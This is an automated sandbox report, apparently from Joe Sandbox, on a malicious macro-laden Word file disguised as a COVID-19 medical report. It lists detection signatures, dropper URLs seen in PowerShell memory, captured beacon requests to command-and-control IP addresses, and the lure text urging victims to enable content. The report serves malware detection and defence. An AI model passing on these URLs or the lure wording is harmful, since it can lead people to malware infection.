Analysis Report XP-9743 Medical report COVID-19.doc

Overview

General Information

Sample Name: XP-9743 Medical report COVID-19.doc
Analysis ID: 338773
MD5: da92c55d4b08367fb79a6bc6ae4da985
SHA1: 8ee3239cfb5dd7d9ddd8e503c8fec19e21ca3c3d
SHA256: 137602cebf7c61fe1bb6647160167813271afbd74a52fcccf03a0ad590a9ef61

Most interesting Screenshot:

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Creates processes via WMI
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Document contains an embedded VBA with many randomly named variables
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Obfuscated command line found
Potential dropper URLs found in powershell memory
Powershell drops PE file
Sigma detected: Suspicious Encoded PowerShell Command Line
Suspicious powershell command line found
Very long command line found
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

AV Detection:

barindex
Antivirus detection for URL or domain
Source: http://hellas-darmstadt.de/cgi-bin/ZSoo/ Avira URL Cloud: Label: malware
Source: http://solicon.us/allam-cycle-1c4gn/f5z/ Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: http://hellas-darmstadt.de/cgi-bin/ZSoo/ Virustotal: Detection: 6% Perma Link
Source: http://solicon.us/allam-cycle-1c4gn/f5z/ Virustotal: Detection: 6% Perma Link
Multi AV Scanner detection for submitted file
Source: XP-9743 Medical report COVID-19.doc Virustotal: Detection: 19% Perma Link
Source: XP-9743 Medical report COVID-19.doc ReversingLabs: Detection: 13%
Machine Learning detection for dropped file
Source: C:\Users\user\Kjl48kr\Nqm9ty9\S93E.dll Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\mscorlib.pdb.dll source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: scorlib.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdb* source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2088678601.0000000002840000.00000002.00000001.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior

Software Vulnerabilities:

barindex
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: remediis.com
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 5.2.81.171:443
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 5.2.81.171:443

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2404340 ET CNC Feodo Tracker Reported CnC Server TCP group 21 192.168.2.22:49168 -> 71.72.196.159:80
Potential dropper URLs found in powershell memory
Source: powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmp String found in memory: https://remediis.com/t/gm2X/
Source: powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmp String found in memory: http://avadnansahin.com/wp-includes/w/
Source: powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmp String found in memory: http://solicon.us/allam-cycle-1c4gn/f5z/
Source: powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmp String found in memory: http://www.riparazioni-radiotv.com/softaculous/DZz/
Source: powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmp String found in memory: http://www.agricampeggiocortecomotto.it/wp-admin/s7p1/
Source: powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmp String found in memory: https://www.starlingtechs.com/GNM/
Source: powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmp String found in memory: http://hellas-darmstadt.de/cgi-bin/ZSoo/
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /wp-includes/w/ HTTP/1.1Host: avadnansahin.comConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 71.72.196.159 71.72.196.159
Source: Joe Sandbox View IP Address: 71.72.196.159 71.72.196.159
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AEROTEK-ASTR AEROTEK-ASTR
Source: Joe Sandbox View ASN Name: TWC-10796-MIDWESTUS TWC-10796-MIDWESTUS
Source: Joe Sandbox View ASN Name: ALASTYRTR ALASTYRTR
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /fumwyj93myhz6vi/3lptbz7/e6hqkyw77ui/dujy6/2toe6aqef56s/cxrwnsqx/ HTTP/1.1DNT: 0Referer: 69.49.88.46/fumwyj93myhz6vi/3lptbz7/e6hqkyw77ui/dujy6/2toe6aqef56s/cxrwnsqx/Content-Type: multipart/form-data; boundary=-------------------HZtvsb4iqah9tnyW329User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 69.49.88.46Content-Length: 5492Connection: Keep-AliveCache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 71.72.196.159
Source: unknown TCP traffic detected without corresponding DNS query: 71.72.196.159
Source: unknown TCP traffic detected without corresponding DNS query: 69.49.88.46
Source: unknown TCP traffic detected without corresponding DNS query: 69.49.88.46
Source: unknown TCP traffic detected without corresponding DNS query: 69.49.88.46
Source: unknown TCP traffic detected without corresponding DNS query: 69.49.88.46
Source: unknown TCP traffic detected without corresponding DNS query: 69.49.88.46
Source: unknown TCP traffic detected without corresponding DNS query: 69.49.88.46
Source: unknown TCP traffic detected without corresponding DNS query: 69.49.88.46
Source: unknown TCP traffic detected without corresponding DNS query: 69.49.88.46
Source: unknown TCP traffic detected without corresponding DNS query: 69.49.88.46
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4AB68257-B28F-4AE5-86AD-026C320EA73C}.tmp Jump to behavior
Source: global traffic HTTP traffic detected: GET /wp-includes/w/ HTTP/1.1Host: avadnansahin.comConnection: Keep-Alive
Source: rundll32.exe, 00000006.00000002.2092559720.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2089009552.0000000001FD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2091693708.0000000001D60000.00000002.00000001.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown DNS traffic detected: queries for: remediis.com
Source: unknown HTTP traffic detected: POST /fumwyj93myhz6vi/3lptbz7/e6hqkyw77ui/dujy6/2toe6aqef56s/cxrwnsqx/ HTTP/1.1DNT: 0Referer: 69.49.88.46/fumwyj93myhz6vi/3lptbz7/e6hqkyw77ui/dujy6/2toe6aqef56s/cxrwnsqx/Content-Type: multipart/form-data; boundary=-------------------HZtvsb4iqah9tnyW329User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 69.49.88.46Content-Length: 5492Connection: Keep-AliveCache-Control: no-cache
Source: powershell.exe, 00000005.00000002.2093523040.0000000003C70000.00000004.00000001.sdmp String found in binary or memory: http://avadnansahin.com
Source: powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmp String found in binary or memory: http://avadnansahin.com/wp-includes/w/
Source: powershell.exe, 00000005.00000002.2093523040.0000000003C70000.00000004.00000001.sdmp String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: powershell.exe, 00000005.00000002.2093523040.0000000003C70000.00000004.00000001.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmp String found in binary or memory: http://hellas-darmstadt.de/cgi-bin/ZSoo/
Source: rundll32.exe, 00000006.00000002.2092559720.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2089009552.0000000001FD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2091693708.0000000001D60000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000006.00000002.2092559720.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2089009552.0000000001FD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2091693708.0000000001D60000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000006.00000002.2092843874.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2089320581.00000000021B7000.00000002.00000001.sdmp, rundll32.exe, 0000000D.00000002.2100702841.0000000001E87000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000006.00000002.2092843874.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2089320581.00000000021B7000.00000002.00000001.sdmp, rundll32.exe, 0000000D.00000002.2100702841.0000000001E87000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: powershell.exe, 00000005.00000002.2093523040.0000000003C70000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.sectigo.com0
Source: powershell.exe, 00000005.00000002.2088032725.0000000002380000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2091689144.0000000002880000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2092831737.00000000027A0000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: rundll32.exe, 00000006.00000002.2092843874.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2089320581.00000000021B7000.00000002.00000001.sdmp, rundll32.exe, 0000000D.00000002.2100702841.0000000001E87000.00000002.00000001.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmp String found in binary or memory: http://solicon.us/allam-cycle-1c4gn/f5z/
Source: rundll32.exe, 00000006.00000002.2092843874.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2089320581.00000000021B7000.00000002.00000001.sdmp, rundll32.exe, 0000000D.00000002.2100702841.0000000001E87000.00000002.00000001.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: powershell.exe, 00000005.00000002.2088032725.0000000002380000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2091689144.0000000002880000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2092831737.00000000027A0000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmp String found in binary or memory: http://www.agricampeggiocortecomotto.it/wp-admin/s7p1/
Source: rundll32.exe, 00000006.00000002.2092559720.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2089009552.0000000001FD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2091693708.0000000001D60000.00000002.00000001.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000006.00000002.2092843874.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2089320581.00000000021B7000.00000002.00000001.sdmp, rundll32.exe, 0000000D.00000002.2100702841.0000000001E87000.00000002.00000001.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: powershell.exe, 00000005.00000002.2093517208.0000000003C6E000.00000004.00000001.sdmp String found in binary or memory: http://www.litespeedtech.com
Source: rundll32.exe, 00000006.00000002.2092559720.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2089009552.0000000001FD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2091693708.0000000001D60000.00000002.00000001.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: powershell.exe, 00000005.00000002.2086528973.0000000000404000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000005.00000002.2086528973.0000000000404000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmp String found in binary or memory: http://www.riparazioni-radiotv.com/softaculous/DZz/
Source: rundll32.exe, 00000008.00000002.2091693708.0000000001D60000.00000002.00000001.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmp String found in binary or memory: https://remediis.com
Source: powershell.exe, 00000005.00000002.2096044095.000000001B606000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmp String found in binary or memory: https://remediis.com/t/gm2X/
Source: powershell.exe, 00000005.00000002.2093497581.0000000003C5C000.00000004.00000001.sdmp String found in binary or memory: https://remediis.comp
Source: powershell.exe, 00000005.00000002.2093523040.0000000003C70000.00000004.00000001.sdmp String found in binary or memory: https://sectigo.com/CPS0D
Source: powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmp String found in binary or memory: https://www.starlingtechs.com/GNM/
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49166
Source: unknown Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49165
Source: unknown Network traffic detected: HTTP traffic on port 49166 -> 443

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 0 Page, I of I Words:
Source: Screenshot number: 4 Screenshot OCR: DOCUMENT IS PROTECTED. I Previewing is not available for protected documents. You have to press "E
Source: Screenshot number: 4 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 4 Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 0 Page, I of I Words: 12 N@m 13 ;a 10096 G
Source: Screenshot number: 8 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. O a S
Source: Screenshot number: 8 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Screenshot number: 8 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 8 Screenshot OCR: ENABLE CONTENT" buttons to preview this document. O a S
Source: Document image extraction number: 0 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0 Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 1 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 1 Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Kjl48kr\Nqm9ty9\S93E.dll Jump to dropped file
Very long command line found
Source: unknown Process created: Commandline size = 5321
Source: unknown Process created: Commandline size = 5220
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 5220 Jump to behavior
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Creates files inside the system directory
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Giyrh\ Jump to behavior
Deletes files inside the Windows folder
Source: C:\Windows\SysWOW64\rundll32.exe File deleted: C:\Windows\SysWOW64\Udumexhq\tqqkqid.sqp
Detected potential crypto function
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_000007FF00272E05 5_2_000007FF00272E05
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10019036 7_2_10019036
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001307D 7_2_1001307D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10016A8F 7_2_10016A8F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_100018B2 7_2_100018B2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_100082BB 7_2_100082BB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10008B58 7_2_10008B58
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000B161 7_2_1000B161
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001D96D 7_2_1001D96D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001B184 7_2_1001B184
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001BFAF 7_2_1001BFAF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10019FCB 7_2_10019FCB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_100095D0 7_2_100095D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000C201 7_2_1000C201
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001440A 7_2_1001440A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000740C 7_2_1000740C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10009211 7_2_10009211
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001D613 7_2_1001D613
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000E813 7_2_1000E813
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000B82E 7_2_1000B82E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000CE33 7_2_1000CE33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001A23E 7_2_1001A23E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10015449 7_2_10015449
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001264A 7_2_1001264A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001364E 7_2_1001364E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10002055 7_2_10002055
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001665D 7_2_1001665D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10005C61 7_2_10005C61
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10005477 7_2_10005477
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001467C 7_2_1001467C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10001E84 7_2_10001E84
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10019496 7_2_10019496
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000169C 7_2_1000169C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_100108A9 7_2_100108A9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_100084B3 7_2_100084B3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10018CB5 7_2_10018CB5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_100122BB 7_2_100122BB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001A4BD 7_2_1001A4BD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10014EC0 7_2_10014EC0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10007EC4 7_2_10007EC4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000D0C9 7_2_1000D0C9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000E6D4 7_2_1000E6D4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_100052D9 7_2_100052D9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000C4D9 7_2_1000C4D9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10002CE2 7_2_10002CE2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000D6E6 7_2_1000D6E6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_100068E6 7_2_100068E6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10012EE8 7_2_10012EE8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001BAED 7_2_1001BAED
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001DAEC 7_2_1001DAEC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_100038F1 7_2_100038F1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10006EF4 7_2_10006EF4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10016318 7_2_10016318
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10019724 7_2_10019724
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000B32E 7_2_1000B32E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10004137 7_2_10004137
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000673B 7_2_1000673B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001AB3D 7_2_1001AB3D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10005F4C 7_2_10005F4C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10010550 7_2_10010550
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10003D60 7_2_10003D60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10015B6D 7_2_10015B6D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10005778 7_2_10005778
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000D385 7_2_1000D385
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10018989 7_2_10018989
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10014988 7_2_10014988
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000ED98 7_2_1000ED98
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000319D 7_2_1000319D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001CB9F 7_2_1001CB9F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001B9C0 7_2_1001B9C0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_100099C3 7_2_100099C3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10009FCC 7_2_10009FCC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000FFD4 7_2_1000FFD4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000F9D8 7_2_1000F9D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000F5DC 7_2_1000F5DC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_100161E6 7_2_100161E6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10010FEF 7_2_10010FEF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000E1F1 7_2_1000E1F1
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: XP-9743 Medical report COVID-19.doc OLE, VBA macro line: Private Sub Document_open()
